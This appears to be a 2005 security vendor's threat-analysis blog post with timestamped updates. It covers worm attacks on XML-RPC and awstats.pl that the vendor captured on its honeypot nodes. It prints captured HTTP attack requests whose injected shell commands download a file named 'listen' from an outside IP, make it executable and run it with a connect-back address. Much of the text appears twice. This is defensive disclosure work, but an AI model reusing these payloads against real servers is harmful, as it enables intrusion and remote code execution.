A few days ago we had an advisory on an XML-RPC malware attacking our smallpot Nodes. The first one we detect as HKTL_CALLBACK.A, and the other as HKTL_CALLBACK.B. The HKTL_CALLBACK.B is being re-verified since there are reports that it is a worm, and not a “hack tool”.
Anyway, right now we are again receiving a round of attacks same as that of the previous XML-RPC ones.
We are currently acquiring the sample (i say ‘currently acquiring’ since some of the sources are dead) and we will post updates later (of course!).
For added reading, check out this link (which pretty much says it all):
ISC
Anyway, right now we are again receiving a round of attacks same as that of the previous XML-RPC ones.
We are currently acquiring the sample (i say ‘currently acquiring’ since some of the sources are dead) and we will post updates later (of course!).
For added reading, check out this link (which pretty much says it all):
ISC
Update (JJ, 08 November 2005 22:09:45)
HKTL_CALLBACK.B will now be detected as ELF_LUPPER.A
Update (JJ, 08 November 2005 22:19:44)
Now we are (again) seeing pretty much the same thing as ISC:
From ISC:
“You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/
For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793
If you are running a vulnerable version, you are advised to upgrade mmediately:
http://www.securityfocus.com/bid/14088/solution”
However, for the xmlrpc.php, instead of downloading the file ‘cback’ or ‘lupii’, it now downloads a file named ‘listen’. Based on initial analysis, it seems to have both the functionalities of ‘cback’ and ‘lupii’:
Possible ELF_LUPPER.B?
- exploits awstats.pl vulnerability
- exploits xmlrpc.php
From ISC:
“You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/
For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793
If you are running a vulnerable version, you are advised to upgrade mmediately:
http://www.securityfocus.com/bid/14088/solution”
However, for the xmlrpc.php, instead of downloading the file ‘cback’ or ‘lupii’, it now downloads a file named ‘listen’. Based on initial analysis, it seems to have both the functionalities of ‘cback’ and ‘lupii’:
- it can be run with an argument, which IMO, acts as a connect-back program for the attacker (same as cback – HKTL_CALLBACK.A)
- it also has worm capabilities to propagate via awstats.pl or xml-rpc exploits (same as lupii – ELF_LUPPER.A)
Possible ELF_LUPPER.B?
Update (JJ, 08 November 2005 22:42:16)
So far we’ve seen the following attacks:
POST requests to the following URL’s:
This, of course attempts to exploits the XML-RPC vulnerability.
It also sends a GET request to exploit the awstats.pl configdir vulnerability and targets the following URL’s:
The malware appends the exploit code at the end of these directories. Sample captures of the 2 attacks are as follows:
XML-RPC
==============================
POST /xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
test.method
‘,”));
echo ‘_begin_’;echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;
echo ‘_end_’;exit;/*
==============================
AWSTATS.PL
==============================
GET /awstats/awstats.pl?configdir=|echo;
echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
==============================
POST requests to the following URL’s:
- /xmlrpc/xmlrpc.php
- /wordpress/xmlrpc.php
- /phpgroupware/xmlrpc.php
- /drupal/xmlrpc.php
- /blogs/xmlsrv/xmlrpc.php
- /blog/xmlsrv/xmlrpc.php
- /blog/xmlrpc.php
This, of course attempts to exploits the XML-RPC vulnerability.
It also sends a GET request to exploit the awstats.pl configdir vulnerability and targets the following URL’s:
- /cgi-bin/
- /cgi-bin/awstats/
- /awstats/
The malware appends the exploit code at the end of these directories. Sample captures of the 2 attacks are as follows:
XML-RPC
==============================
POST /xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
echo ‘_begin_’;echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;
echo ‘_end_’;exit;/*
==============================
AWSTATS.PL
==============================
GET /awstats/awstats.pl?configdir=|echo;
echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
==============================